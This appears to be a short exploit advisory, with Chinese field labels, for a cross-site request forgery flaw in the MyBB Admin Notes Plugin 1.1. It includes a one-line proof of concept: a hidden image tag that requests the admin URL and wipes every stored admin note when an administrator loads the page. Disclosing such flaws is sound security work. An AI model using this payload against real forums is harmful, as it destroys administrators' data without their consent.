MyBB Admin Notes Plugin 1.1 – Cross-Site Request Forgery

  • 作者: 0xB9
    日期: 2018-05-16
  • 类别:
  • 来源:
  • # Exploit Title: MyBB Admin Notes Plugin - CSRF
    # Date: 2018-05-14
    # Author: 0xB9
    # Contact: or 0xB9[at]
    # Software Link:
    # Version: 1.1
    # Tested on: Ubuntu 18.04
    # 1. Description: The plugin allows administrators to save notes and display them in a list in the ACP. The CSRF allows an attacker to remotely delete all admin notes.
    # 2. Proof of Concept:
    		<img style="display:none" src="http://localhost/mybb/admin/index.php?empty=table" alt="">
    # 3. Solution:
    # Update to the latest release
    # Patch: